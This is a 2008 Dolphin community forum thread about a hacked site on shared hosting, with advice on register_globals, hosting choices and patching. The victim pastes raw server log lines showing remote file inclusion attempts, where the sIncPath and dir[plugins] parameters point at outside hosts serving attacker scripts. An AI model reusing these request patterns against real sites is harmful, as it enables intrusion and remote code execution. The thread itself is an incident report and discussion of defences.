Site Hacked

rednerus posted 27th of July 2008 in Community Voice. 9 comments.

To my surprise,One fine morning I saw my dolphin site (v 6.1.2) (which was hosted on ixweb shared hosting) hacked. All the files in /inc directory and all the profile images/music files/video files were removed.I did not take back up of my site for the past few days so I lost few members and pictures/videos/music of existing members.

Did anybody experience the same ??

When I look at the analytics I observed few visits from Nigeria/lagos on the same day and on virus scanning my dolphin site files after downloading I saw few files which were infected with virus. I found them in cache and langs folder and the files were named as

hp.php,msconfig.php,mode.php,hp.php,botnet.pl

I had to reinstall the whole site with the latest source (v6.1.4). Unfotunately I could not find the ip addresses of the nigerian visitors even from webalizer.

My question is with the security patch that was released recently would I be free from this type of hacks ??

I found a site @ http://www.wizcrafts.net/nigerian-blocklist.html and altered the .htaccess file in the root to block the traffic from nigeria.

Is there anything I could do to avoid this kind of attacks ?? any suggestions ?

 

 
Comments
·Oldest
·Top
Please login to post a comment.
sammie
get a dedicated server or host with someone that has a dedicated server, there are a few of us that have a dedicated server and offer hosting, as we setup our servers for our dolphin sites, you can be assured that unlike shared hosting, we protect our own servers from hackers as much as we can.

shared hosts, setup their servers to accomidate for the masses, and leave huge security holes in them.
lrepton
Yup....this morning it is down again at ixwebhosting.com! Webserver probs!!!!!!!

Even tho we have "dedicated" servers for our domain there, the database is on a "shared" server.

So, far I have not been hacked. (Crossed fingers) But I added the php.ini file suggested by many to alter the register globals that ixwebhosting has ON. (Should be OFF for security)
DosDawg
as noted on the blogs from boonex. there have been two releases that address security problems. but i take the stand sammie has, first of all, read the server requirements that boonex recommends, when you go against what the develper says, then you have to expect to have unpredictable outcomes. now beyond that, if you are on a server where register_globals are ON, then you are defying gravity itself, as stated by php.net, register_globals should be off, and developers should try to write their software see more so that register_globals are not required to be on.

now when you go to a host where by default, they have turned on register_globals, you have to see the red flags standing up in the air on that one. what happens, is that it doesnt necessarily have to be the dolphin suite that gets hacked, but the server itself, that is the vulnerability moreso than the script. once the server is compromised, the culprits will use whatever avenue they can to access sites and deface them, its a game to them, so one jamokey buys himself a $1.99 hosting account and all his little cronies then try their attacks, once they have a script that has the RFI exploit exposed, then they start posting this information. its not that any one individual pays the money, look at the sparce wan that was hit, most all kids who have a website, be it php or joomla or whatever, they are most likely on a shared server, then they have their clan, and as soon as they find a script with a hole, and its posted on the internet that there is a hole in the script, not otherwise accessible but for the script being hosted on a shared server. now what happens is that they load up a remote shell script (php) and they all get busy looking around in the server. why is it they dont get caught you say, well granted it is a shared server account, nobody really cares if the data gets lost of not from the hosting company, just as 100 $1.99 accounts leave, 100 $1.99 accounts come in the next day. this server is not monitored, and you are just fair game when you are on a shared hosting environment.

so yes, you can apply what patches you can find, you can upload the latest release, but to me this is only running on a wing and a prayer. you need to get to a minimum VPS and better than that is a Dedicated server. well i am done rambling

later,
DosDawg
sammie
you can not be on a dedicated server, you have your own box and your own database is on that box,
so you must be on shared hosting, if you have to use a database other than localhost.
godaddy have the same setup with their shared hosting, they have you use a database on another server,
sammie
this is a chat i had with your host:

i believe you are mixing a dedicated ip with a dedicated server, they do not have any VPS or dedicated servers on offer for hosting.

Chat InformationPlease wait for a site operator to respond.

Chat InformationYou are now chatting with 'Alex Golovko'

Alex Golovko: Hello, my name is Alex, please let me know how can I help you today?

you: hi, i was looking at your site and i do not see any dedcated servers or VPS

you: do you not offer either?

you: see more or are you just a shared hosting plan?

Alex Golovko: We're not providing dedicated or VSP servers sorry, all servers shared

you: ok thank you ever so much for your help, have a nice day

this comment is the killer:
We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!

hackers can run any application they like

love it
gameutopia
If they have register globals on with all there severs that seems odd. Maybe they are using a older version of php which could potentially be the cause of other Vulnerabilities. But that wouldn't make sense that they wouldn't just turn it off. Or possibly something with their setup in particular the software they run is an older script that requires register globals on. I don't know hspere that well, last time I checked that's what they were running. Or maybe their billing/automation script requires see more this. It does seem kind of odd that a fairly large host like ixwebhosting hasn't had other problems related to register globals on and made some adjustments.
sammie
this comment is the killer:
We offer hosting on both Linux and Windows platforms. Our servers run ANY application you like!

hackers can run any application they like

love it

you missed that part, to run any app you need to have register globals on.

they are telling you that anyone can run anything on their shared servers,

they do not have any other servers, all are shared, all are setup to run any app you want,.

thats register globals on all their servers.

they blame the hacking see more on the scripts,. not their hosting practices.
little you gets hacked, they tell you to patch your script, it aint thier fault.
lmfao
rednerus
Thanks sammie,DosDawg,gameutopia for your inputs.
I would certainly go for a dedicated server once the site becomes bit busy. I would atleast go for a VPS for now but I am still not convinced that I would be safe either.I have chosen IX after knowing that it was one of the best sites and I host several of my other websites over there now.I think I will have to change the host now.
I looked at the log files and found these
189.112.40.11 - - [24/Jul/2008:21:36:06 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem1/jovemNOR.txt? see more HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
216.206.238.35 - - [24/Jul/2008:21:50:23 -0500] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 98 "-" "libwww-perl/5.803"
148.223.69.2 - - [24/Jul/2008:21:53:28 -0500] "GET //?sIncPath=http://hibbard22.net/id.txt? HTTP/1.1" 200 98 "-" "libwww-perl/5.805"
189.112.40.11 - - [24/Jul/2008:22:12:43 -0500] "GET //?sIncPath=http://h1.ripway.com/jovem2/id.txt? HTTP/1.1" 200 98 "-" "Mozilla/3.0 (compatible; Indy Library)"
98.129.33.59 - - [24/Jul/2008:22:27:29 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
67.205.76.81 - - [24/Jul/2008:22:27:07 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 302 5 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET /privacy.php//plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 15239 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:01 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:50 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt?? HTTP/1.1" 200 313 "-" "libwww-perl/5.810"
67.205.76.81 - - [24/Jul/2008:22:27:56 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt??? HTTP/1.1" 200 371 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:28:43 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.805"
216.246.91.250 - - [24/Jul/2008:22:28:44 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
216.246.91.250 - - [24/Jul/2008:22:28:04 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://www.medmix.com/oye.txt%0D?? HTTP/1.1" 200 550 "-" "libwww-perl/5.810"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:32 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:40 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:30:41 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:30:48 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.1" 200 627 "-" "libwww-perl/5.805"
98.129.33.59 - - [24/Jul/2008:22:40:22 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://shoptoearnopportunity.com/images/css.png?? HTTP/1.0" 200 601 "-" "Mozilla/5.0"
98.129.33.59 - - [24/Jul/2008:22:40:30 -0500] "GET //plugins/safehtml/safehtml.php?dir[plugins]=http://radioactivecrew.com/ec.txt?? HTTP/1.1" 200 371 "-" "libwww-perl/5.805"
82.128.9.68 - - [25/Jul/2008:04:59:49 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=back HTTP/1.1" 200 131 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
82.128.9.68 - - [25/Jul/2008:04:59:50 -0500] "GET //plugins/safehtml/safehtml.php?dir%5Bplugins%5D=http%3A%2F%2F6babe.dk%2Fst%2Fc.txt%3F&act=img&img=home HTTP/1.1" 200 221 "//plugins/safehtml/safehtml.php?dir[plugins]=http://6babe.dk/st/c.txt?" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
AndreyP
1. If you will have register globals in Off
such injections will impossible
xxx.php?sIncPath=unwanted_code_path

2. since 6.1.4 we always re-setup all variables before using, so in even don`t will get incoming params

3. we don`t use global $dir more in not-safe places
 
 
Below is the legacy version of the Boonex site, maintained for Dolphin.Pro 7.x support.
The new Dolphin solution is powered by UNA Community Management System.
PET:0.17635607719421